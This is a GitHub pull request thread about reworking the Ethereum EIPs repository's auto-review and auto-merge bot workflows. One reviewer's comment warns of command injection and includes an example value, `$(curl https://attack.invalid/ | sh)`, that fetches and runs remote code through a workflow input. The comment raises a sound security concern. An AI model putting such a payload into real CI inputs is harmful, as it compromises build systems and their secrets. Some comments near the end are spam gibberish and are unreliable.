### PR TITLE
Fix EIP Bot

### PR DESCRIPTION
**Pull request by Pandapip1**
Will need a manual merge, and the following branch protection settings will need to be updated:

- Enable "Require Review from Code Owners"
- Enable "Dismiss Stale PR Reviews"
- Remove "Auto-Merge Bot / EIP Auto-Merge Bot" from required checks

Do these only **AFTER** this PR is merged.

~~**NEEDS TESTING, BE READY TO REVERT THIS PR IF NEEDED**~~ This has been successfully E2E tested.

Here's how it works:
1. The original triggering event triggers the trigger workflow.
2. The trigger job runs, adding the PR Number as an artifact.
3. The trigger workflow completes, triggering the actual workflow.
4. EIP-Bot runs
5. If EIP-Bot passes, then auto-merge is enabled and @eth-bot submits an approval, passing the CODEOWNERS review.
6. Automerge merges the PR

### CODE REVIEW

**Comment by Pandapip1** [comment]
Unfortunately, it's hard to know if the changes will work or not.

File: .github/workflows/auto-review-bot.yml
Comment (SamWilsn) [inline .github/workflows/auto-review-bot.yml:54]: Why do you need to fetch the PR artifact above if you can access it here?

File: .github/workflows/auto-review-bot.yml
Comment (SamWilsn) [inline .github/workflows/auto-review-bot.yml:51]: What's `always()`?

File: .github/workflows/auto-review-trigger.yml
Comment (SamWilsn) [inline .github/workflows/auto-review-trigger.yml:50]: Why do two jobs upload the artifact?

**Review by SamWilsn — COMMENTED** [review]
Left a few comments, but I have no idea what's going on here :rofl:

File: .github/workflows/auto-review-bot.yml
Comment (Pandapip1) [reply .github/workflows/auto-review-bot.yml:51]: Runs even if any of the previous steps fail. In this case, it's for later extendability.

File: .github/workflows/auto-review-trigger.yml
Comment (Pandapip1) [reply .github/workflows/auto-review-trigger.yml:50]: There are actually three jobs, one for each type. I could make it all one job, but it would get messy really quick.

File: .github/workflows/auto-review-bot.yml
Comment (Pandapip1) [reply .github/workflows/auto-review-bot.yml:54]: One can't access it here.

**Comment by MicahZoltu** [comment]
> Unfortunately, it's hard to know if the changes will work or not in advance. I think they will, but it really is hard to know.

It can (and should) be tested against a fork of the EIPs repository.  This is how alita did all of their testing before we merged bot changes previously.

Out of curiosity, does anyone know why we don't just rely on GitHub's built in automerge feature entirely?  It requires all checks pass I believe, so as long there is a bot to check for appropriate approvals (fails other ise) it feels like that *should* be good enough?

**Comment by JEAlfonsoP** [comment]
> > Unfortunately, it's hard to know if the changes will work or not in advance. I think they will, but it really is hard to know.
> 
> It can (and should) be tested against a fork of the EIPs repository. This is how alita did (I do not want to said something different but when I contacted her, She suggested to run a yarn test (I presume manually) ) all of their testing before we merged bot changes previously.

There are some changes needed to be done in yours EIP fork: .github/workflows
We have managed to get the Bot (auto merge bot) running, still working in the test cases for the PRs.
  
> 
> Out of curiosity, does anyone know why we don't just rely on GitHub's built in automerge feature entirely? It requires all checks pass I believe, so as long there is a bot to check for appropriate approvals (fails other ise) it feels like that _should_ be good enough?

I believe that automerge is not an option if You the Editors do not feel 100% comfortable with BOTs and/or Validators. Thats why I imaging there are so many open issues and, why we have been working to get an automatized working environment.

**Comment by JEAlfonsoP** [comment]
> Unfortunately, it's hard to know if the changes will work or not in advance. I think they will, but it really is hard to know.

We can test it (or at least try to).

**Comment by Pandapip1** [comment]
> Out of curiosity, does anyone know why we don't just rely on GitHub's built in automerge feature entirely? It requires all checks pass I believe, so as long there is a bot to check for appropriate approvals (fails other ise) it feels like that should be good enough?

That is exactly what we're doing right now.

File: .github/workflows/auto-review-trigger.yml
Comment (JEAlfonsoP) [reply .github/workflows/auto-review-trigger.yml:50]: It would not be easier for the bot to ask for the EIP number desired (and confirmed it is not used) and >=2  Editors can assign it ? 
Changing .yml's are harder to test, this is why the original .yml code is simple,  therefore we code the bot for whatever the Editors wish.

Comment (Pandapip1) [reply .github/workflows/auto-review-trigger.yml:50]: @JEAlfonsoP It's actually a bit more subtle than that. There's an issue with the workflow files themselves that is not resolvable within the scope of the EIP-Bot repository. However, EIP-Bot will continue to work as if nothing happened.

**Comment by Pandapip1** [comment]
@MicahZoltu please approve https://github.com/Pandapip1/EIPs-clone/pull/1 for E2E testing purposes.

**Comment by Pandapip1** [comment]
Allow force pushes is fine to be disabled. Everything else that is ticked yes should be ticked yes, and _only_ the required checks listed above should be added as required.

**Comment by MicahZoltu** [comment]
> That is exactly what we're doing right now.

Currently, we have `automerge` which means automerge isn't enabled on branches by default.  Why isn't it?

Also, we have several workflows that trigger bot re-runs, which also doesn't make sense to me.  Why not just have the EIP-Bot trigger on `pull_request_review` so it gets run again when someone submits a review?

Perhaps the issue is that EIP-Bot needs *some* write permissions and there is no `pull_request_review_target`?  If this is the case, it feels like the right solution is to split the bot into pieces that need write permission and pieces that don't.  I believe the write permissions are for labeling, and I think @Pandapip1 already has a PR out to handle labeling so if that is the only thing we need write permission for then we can just delete the labeling from the bot.

**Comment by Pandapip1** [comment]
> Currently, we have automerge which means automerge isn't enabled on branches by default. Why isn't it?

There is no such option.

> Also, we have several workflows that trigger bot re-runs, which also doesn't make sense to me. Why not just have the EIP-Bot trigger on pull_request_review so it gets run again when someone submits a review?

EIP-Bot requires access to secrets. `pull_request_review` doesn't give access to secrets.

> Perhaps the issue is that EIP-Bot needs some write permissions and there is no pull_request_review_target? If this is the case, it feels like the right solution is to split the bot into pieces that need write permission and pieces that don't. I believe the write permissions are for labeling, and I think @Pandapip1 already has a PR out to handle labeling so if that is the only thing we need write permission for then we can just delete the labeling from the bot.

It needs to be able to access the secret for the user account of @eth-bot, so that it can:

a) comment
b) label

**Comment by Pandapip1** [comment]
This works. https://github.com/Pandapip1/EIPs-clone/pull/1

**Comment by Pandapip1** [comment]
Here's a diagram:
image

**Comment by Pandapip1** [comment]
@MicahZoltu would you mind merging this?

a) It's an improvement over the previous design
b) It works.

**Comment by MicahZoltu** [comment]
Needs review from other editors.  While we wait for Sam to get permission to merge, I don't mind helping out, but as I'm no longer an editor I don't want to make calls on what should/shouldn't be merged.

**Comment by Pandapip1** [comment]
> I'm no longer an editor

You are still an editor until that PR is merged.

**Comment by MicahZoltu** [comment]
> You are still an editor until that PR is merged.

Fixed.

**Comment by lightclient** [comment]
I don't follow this PR, but EIP auto-merge bot seems to be failing with an unhandled errore?

File: .github/workflows/auto-review-bot.yml
Comment (SamWilsn) [inline .github/workflows/auto-review-bot.yml:38]: Has this been upstreamed to https://github.com/ethereum/EIP-bot?

File: .github/workflows/auto-review-bot.yml
Comment (SamWilsn) [inline .github/workflows/auto-review-bot.yml:48]: Do we need to update [EIP-5069](https://eips.ethereum.org/EIPS/eip-5069)?

File: .github/workflows/auto-review-trigger.yml
Comment (SamWilsn) [inline .github/workflows/auto-review-trigger.yml:16]: I assume only contributors can dispatch a workflow? I'd be concerned about setting `pr_number` to something like `$(curl https://attack.invalid/ | sh)`.

File: .github/workflows/auto-review-bot.yml
Comment (Pandapip1) [reply .github/workflows/auto-review-bot.yml:48]: EIP-Bot is out of date there, but that's outside of the scope of this PR.

File: .github/workflows/auto-review-trigger.yml
Comment (Pandapip1) [reply .github/workflows/auto-review-trigger.yml:16]: This is correct.

**Comment by Pandapip1** [comment]
> I don't follow this PR, but EIP auto-merge bot seems to be failing with an unhandled errore?

This PR deletes files, which EIP-Bot can't handle yet.

File: .github/workflows/auto-review-bot.yml
Comment (Pandapip1) [reply .github/workflows/auto-review-bot.yml:48]: Oh, I misunderstood you. Yes, I'll update it.

**Review by lightclient — APPROVED** [review]

**Comment by lightclient** [comment]
Sorry about that

**Comment by Imihar** [comment]
> Will need a manual merge, and the following branch protection settings will need to be updated:
> 
> * Enable "Require Review from Code Owners"
> * Enable "Dismiss Stale PR Reviews"
> * Remove "Auto-Merge Bot / EIP Auto-Merge Bot" from required checks
> 
> Do these only **AFTER** this PR is merged.
> 
> ~**NEEDS TESTING, BE READY TO REVERT THIS PR IF NEEDED**~ This has been successfully E2E tested.
> 
> Here's how it works:
> 
> 1. The original triggering event triggers the trigger workflow.
> 2. The trigger job runs, adding the PR Number as an artifact.
> 3. The trigger workflow completes, triggering the actual workflow.
> 4. EIP-Bot runs
> 5. If EIP-Bot passes, then auto-merge is enabled and @eth-bot submits an approval, passing the CODEOWNERS review.
> 6. Automerge merges the PR

**Comment by Imihar** [comment]
Zoyshmxmwjtemgdhdluekysumo73orkdmhsmhdluek6elydumjdluei6ei6ei6ei62i5wiysmhjflieluei6wi6witei5wkydmnhdluei6wjtwjtwjtemhc
n n
culekyektsumjuskywnysmhchei6wyneh.dmue6i2i6i26255ismhzhmei5wjtwngemekt2jtwkhrmhsyoewmhsmbzhmekywi6ei6ei6ei6wkywo6e.hc
HDkywi6wjtkyrkudlye5j2mhs.hsmywtjw5w5iw5iwjtei5ei63k6eyne gsh wnteyke773ymryekyitns gsntenyemhrlurumdhmegndmur

**Comment by Imihar** [comment]
Mbsyke7lemhsmhrkyemhdmhelyrmbcmhrumdmhrkueiyei6wjtsmhhmeykeiyentsb.dmyei6e6ieyndhmdkyr6i3i6ekyenhsnhdh dnyeyk36iekydmhdmheky3oyrmhsmhekyrukdhmdmyrmhx.hrkuryndgj6tedhndmurynegndlur7irlud g nyeundhmdumeukrumfjmrurum

**Review by girlsavenue — COMMENTED** [review]
#6040 #5659 #5653 #6013 #6043

**Review by Scamreno — APPROVED** [review]

**Review by montana77783 — APPROVED** [review]

**Review by FELLIX000 — APPROVED** [review]

**Comment by watkunggmonkeyday-commits** [comment]
https://github.com/ethereum/EIPs/actions/runs/13275405491/job/37063975049

**Pull request merged**
